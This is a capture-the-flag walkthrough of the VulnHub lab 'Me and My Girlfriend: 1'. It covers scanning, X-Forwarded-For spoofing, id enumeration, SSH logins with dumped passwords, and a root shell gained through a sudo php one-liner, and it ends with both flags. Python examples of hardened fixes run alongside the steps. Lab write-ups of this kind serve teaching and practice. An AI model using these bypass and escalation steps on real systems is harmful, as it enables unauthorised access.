ME AND MY GIRLFRIEND: 1
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
Host discovery
┌──(root💀yunki)-[/home/yunki/vulnhub/meandmygf1]
└─# nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.15
Host is up (0.00021s latency).
MAC Address: 00:0C:29:CC:B8:EE (VMware)
nmap scan
┌──(root💀yunki)-[/home/yunki/vulnhub/meandmygf1]
└─# nmap --min-rate 10000 -p- 192.168.54.15
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:CC:B8:EE (VMware)
┌──(root💀yunki)-[/home/yunki/vulnhub/meandmygf1]
└─# nmap -sT -sV -O -p22,80 192.168.54.15
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:CC:B8:EE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(root💀yunki)-[/home/yunki/vulnhub/meandmygf1]
└─# nmap -sU -p22,80 192.168.54.15
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:CC:B8:EE (VMware)
┌──(root💀yunki)-[/home/yunki/vulnhub/meandmygf1]
└─# nmap --script=vuln -p22,80 192.168.54.15
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /robots.txt: Robots file
| /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_ /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:CC:B8:EE (VMware)
Web penetration
Directory scan
# yunki @ yunki in ~ [10:11:53]
$ dirb http://192.168.54.15
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 21 10:11:57 2023
URL_BASE: http://192.168.54.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.15/ ----
==> DIRECTORY: http://192.168.54.15/config/
+ http://192.168.54.15/index.php (CODE:200|SIZE:120)
==> DIRECTORY: http://192.168.54.15/misc/
+ http://192.168.54.15/robots.txt (CODE:200|SIZE:32)
+ http://192.168.54.15/server-status (CODE:403|SIZE:293)
---- Entering directory: http://192.168.54.15/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.54.15/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Mar 21 10:12:01 2023
DOWNLOADED: 4612 - FOUND: 3
Viewing the web pages
# yunki @ yunki in ~ [10:12:01]
$ curl http://192.168.54.15
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->%
# yunki @ yunki in ~ [10:15:12]
$ curl http://192.168.54.15/robots.txt
User-Agent: *
Allow: /heyhoo.txt%
# yunki @ yunki in ~ [10:15:21]
$ curl http://192.168.54.15/heyhoo.txt
Great! What you need now is reconn, attack and got the shell%
The home page says it can only be accessed locally, so Burp Suite is used to set the X-Forwarded-For header to localhost and the page is requested again;
after registering, log in.
Something odd shows up in the URL: changing the id parameter changes the displayed content as well.
So, starting from id=1, try an SSH login with each user's password.
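The two web-side weaknesses the walkthrough relies on are an access check that trusts the client-supplied X-Forwarded-For header and a profile page that serves whatever id the URL names. The following is an added example, not code from the VulnHub box, that models each check next to a hardened version; the proxy address in TRUSTED_PROXIES, the request/session dicts and the USERS table are all constructed sample values.

```python
"""
Added example (not the box's code): the "local only" check and the profile
lookup, each in its vulnerable form and a hardened form.
"""
from ipaddress import ip_address

# Assumed address of a reverse proxy we operate; placeholder, not from the page.
TRUSTED_PROXIES = {"10.0.0.5"}


def is_local_vulnerable(headers, remote_addr):
    # Vulnerable: the header is attacker-controlled, so any client can claim
    # to be local, which is exactly the bypass hinted at in the page's comment.
    claimed = headers.get("X-Forwarded-For", remote_addr)
    return claimed.split(",")[0].strip() in ("127.0.0.1", "localhost", "::1")


def is_local_hardened(headers, remote_addr):
    # Hardened: honour X-Forwarded-For only when the TCP peer is a proxy we
    # control, and then take the right-most hop (the one our proxy appended).
    client = remote_addr
    if remote_addr in TRUSTED_PROXIES and "X-Forwarded-For" in headers:
        client = headers["X-Forwarded-For"].split(",")[-1].strip()
    try:
        return ip_address(client).is_loopback
    except ValueError:
        # "localhost" or any non-address string is not a loopback address: deny.
        return False


# Constructed user table with the same shape as tbl_users on the box (values invented).
USERS = {
    1: {"username": "user1", "email": "user1@example.com"},
    2: {"username": "user2", "email": "user2@example.com"},
}


def profile_vulnerable(session, requested_id):
    # Vulnerable: any logged-in user can read any record by editing the id
    # in the URL (an insecure direct object reference).
    if "user_id" not in session:
        return None
    return USERS.get(requested_id)


def profile_hardened(session, requested_id):
    # Hardened: the record served must belong to the session owner.
    if "user_id" not in session or session["user_id"] != requested_id:
        return None
    return USERS.get(requested_id)


if __name__ == "__main__":
    spoofed = {"X-Forwarded-For": "localhost"}
    print("vulnerable check with spoofed header:", is_local_vulnerable(spoofed, "192.168.54.100"))
    print("hardened check with spoofed header:  ", is_local_hardened(spoofed, "192.168.54.100"))
    print("other user's profile, vulnerable:", profile_vulnerable({"user_id": 2}, 1))
    print("other user's profile, hardened:  ", profile_hardened({"user_id": 2}, 1))
```

The hardened address check deliberately refuses the string "localhost": only a parsed loopback address counts, and only when the request arrived through a proxy the application trusts. The hardened profile lookup ignores the URL id for authorization purposes entirely, which is what closes the id-walking the walkthrough describes.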
Getting an initial shell
# yunki @ yunki in ~ [10:31:21]
$ sudo ssh eweuhtandingan@192.168.54.15
[sudo] yunki 的密码:
The authenticity of host '192.168.54.15 (192.168.54.15)' can't be established.
ECDSA key fingerprint is SHA256:lE5D8AvkJqcIwHiNuI9aSnC3ohlDrhPhjDljqSDy9sY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.15' (ECDSA) to the list of known hosts.
eweuhtandingan@192.168.54.15's password:
Permission denied, please try again.
eweuhtandingan@192.168.54.15's password:
# yunki @ yunki in ~ [10:33:34] C:130
$ sudo ssh aingmaung@192.168.54.15
aingmaung@192.168.54.15's password:
Permission denied, please try again.
aingmaung@192.168.54.15's password:
# yunki @ yunki in ~ [10:34:04] C:130
$ sudo ssh sundatea@192.168.54.15
sundatea@192.168.54.15's password:
Permission denied, please try again.
sundatea@192.168.54.15's password:
# yunki @ yunki in ~ [10:34:57] C:130
$ sudo ssh sedihaingmah@192.168.54.15
sedihaingmah@192.168.54.15's password:
Permission denied, please try again.
sedihaingmah@192.168.54.15's password:
# yunki @ yunki in ~ [10:35:44] C:130
$ sudo ssh alice@192.168.54.15
alice@192.168.54.15's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$
alice@gfriEND:~$ whoami
alice
alice@gfriEND:~$ uname -a
Linux gfriEND 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
alice@gfriEND:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:cc:b8:ee brd ff:ff:ff:ff:ff:ff
inet 192.168.54.15/24 brd 192.168.54.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fecc:b8ee/64 scope link
valid_lft forever preferred_lft forever
With a shell, go to the web directory and look at the two PHP files.
alice@gfriEND:/var/www/html$ cat config/config.php
<?php
$conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html$ mysql -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 81
Server version: 5.5.64-MariaDB-1ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ceban_corp |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
MariaDB [(none)]> use ceban_corp
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [ceban_corp]> show tables;
+----------------------+
| Tables_in_ceban_corp |
+----------------------+
| tbl_users |
+----------------------+
1 row in set (0.00 sec)
MariaDB [ceban_corp]> select * from tbl_users;
+----+-----------------+----------------+-------------+------------------------------+
| id | name | username | password | email |
+----+-----------------+----------------+-------------+------------------------------+
| 1 | Eweuh Tandingan | eweuhtandingan | skuyatuh | eweuhtandingan@cebancorp.com |
| 2 | Aing Maung | aingmaung | qwerty!!! | aingmaung@cebancorp.com |
| 3 | Sunda Tea | sundatea | indONEsia | sundatea@cebancorp.com |
| 4 | Sedih Aing Mah | sedihaingmah | cedihhihihi | sedihaingmah@cebancorp.com |
| 5 | Alice Geulis | alice | 4lic3 | alice@cebancorp.com |
| 9 | Abdi Kasep | abdikasepak | dorrrrr | abdikasep@cebancorp.com |
| 12 | 123 | 123 | 123 | 123@qq.com |
| 13 | 123 | 123 | 123a | 123@qq.com |
+----+-----------------+----------------+-------------+------------------------------+
8 rows in set (0.00 sec)
MariaDB [ceban_corp]> exit
Bye
Nothing useful here.
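The tbl_users dump above stores every password in clear text, and one of those application passwords is what opened the SSH account. The following is an added example, not code from the box, showing how the same table would look if the application stored salted scrypt hashes instead and how verification then works; the rows in SAMPLE_ROWS are constructed and the storage format string is an assumed convention.

```python
"""
Added example (not the box's code): salted scrypt password storage for a
table shaped like tbl_users, so a database read no longer yields reusable
credentials.
"""
import hashlib
import hmac
import os
from typing import Optional

# scrypt cost parameters (assumed values; 128 * N * r bytes of memory = 16 MiB).
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    # A fresh 16-byte random salt per password; the salt is stored with the hash.
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    # Assumed storage format: algorithm$salt_hex$digest_hex.
    return f"scrypt${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    try:
        algo, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    # Constant-time comparison so a mismatch does not leak how many bytes matched.
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed rows with the shape (id, username, password) of tbl_users; values invented.
SAMPLE_ROWS = [
    (1, "user1", "hunter2"),
    (2, "user2", "correct horse battery"),
]


def migrate_table(rows):
    # One-off migration: replace each clear-text password with its hash.
    return [(uid, name, hash_password(pw)) for uid, name, pw in rows]


if __name__ == "__main__":
    for uid, name, stored in migrate_table(SAMPLE_ROWS):
        print(uid, name, stored)
    print(verify_password("hunter2", migrate_table(SAMPLE_ROWS)[0][2]))
```

After migration the table no longer contains anything that can be typed into an SSH prompt; an attacker who reads it has to crack each salted hash individually, and the scrypt cost makes that slow. Using a different password for the shell account than for the web application is the other half of the fix, since hashing does nothing against reuse that the user chose.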
Privilege escalation
alice@gfriEND:/var/www/html$ sudo -l
Matching Defaults entries for alice on gfriEND:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on gfriEND:
(root) NOPASSWD: /usr/bin/php
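A NOPASSWD rule for an interpreter such as php is equivalent to a root shell, because the interpreter can execute arbitrary commands. The following is an added example, not from the page, of a small audit that parses the text form of sudo -l and flags entries whose binary is a known interpreter or shell-capable tool; SAMPLE_SUDO_L is constructed from the output above with one extra harmless line, and SHELL_CAPABLE is a short illustrative list, not an exhaustive one.

```python
"""
Added example (not the box's code): flag sudo rules that grant an interpreter
or other shell-capable binary, which are root-equivalent regardless of the
NOPASSWD tag.
"""
import os
import re

# Illustrative list (assumption): binaries that can run arbitrary commands.
SHELL_CAPABLE = {
    "php", "python", "python2", "python3", "perl", "ruby", "node",
    "bash", "sh", "dash", "zsh", "vim", "vi", "less", "more", "find", "awk",
}

# Constructed from the sudo -l output above, plus one benign rule for contrast.
SAMPLE_SUDO_L = """Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php
    (root) /usr/bin/systemctl restart apache2
"""

# One rule line: "(runas) TAG: TAG: cmd1, cmd2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return one dict per granted command from the text form of sudo -l."""
    entries, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if cmd:
                entries.append({"runas": m["runas"].strip(), "tags": tags, "command": cmd})
    return entries


def risky_entries(entries):
    """Entries whose command is ALL or whose binary can spawn a shell."""
    findings = []
    for e in entries:
        binary = os.path.basename(e["command"].split()[0])
        if e["command"] == "ALL" or binary in SHELL_CAPABLE:
            findings.append({
                "runas": e["runas"],
                "command": e["command"],
                "nopasswd": "NOPASSWD" in e["tags"],
                "reason": "ALL" if e["command"] == "ALL" else f"{binary} can execute arbitrary commands",
            })
    return findings


if __name__ == "__main__":
    for f in risky_entries(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f)
```

The fix on the host side is to remove the php rule or restrict it to a specific script path with fixed arguments; sudo itself is not at fault, the grant is. Running this over `sudo -l -U <user>` output for each account is a cheap recurring check.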
# Since php can be run with sudo, run php via sudo and spawn /bin/bash from it.
alice@gfriEND:/var/www/html$ sudo /usr/bin/php -r "system('/bin/bash');"
root@gfriEND:/var/www/html# whoami
root
root@gfriEND:/var/www/html# cd /root
root@gfriEND:/root# ls
flag2.txt
root@gfriEND:/root# cat flag2.txt
________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:~/.my_secret# whoami
root
root@gfriEND:~/.my_secret# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:cc:b8:ee brd ff:ff:ff:ff:ff:ff
inet 192.168.54.15/24 brd 192.168.54.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fecc:b8ee/64 scope link
valid_lft forever preferred_lft forever
flag1:
root@gfriEND:/root# cd ~
root@gfriEND:~# ls -liah
total 36K
21088 drwxr-xr-x 4 alice alice 4.0K Mar 21 09:41 .
12 drwxr-xr-x 6 root root 4.0K Dec 13 2019 ..
21128 -rw------- 1 alice alice 10 Dec 13 2019 .bash_history
21090 -rw-r--r-- 1 alice alice 220 Dec 13 2019 .bash_logout
21089 -rw-r--r-- 1 alice alice 3.6K Dec 13 2019 .bashrc
21126 drwx------ 2 alice alice 4.0K Dec 13 2019 .cache
142082 drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .my_secret
21255 -rw------- 1 alice alice 69 Mar 21 09:41 .mysql_history
21091 -rw-r--r-- 1 alice alice 675 Dec 13 2019 .profile
root@gfriEND:~# cd .my_secret/
root@gfriEND:~/.my_secret# ls
flag1.txt
my_notes.txt
root@gfriEND:~/.my_secret# cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}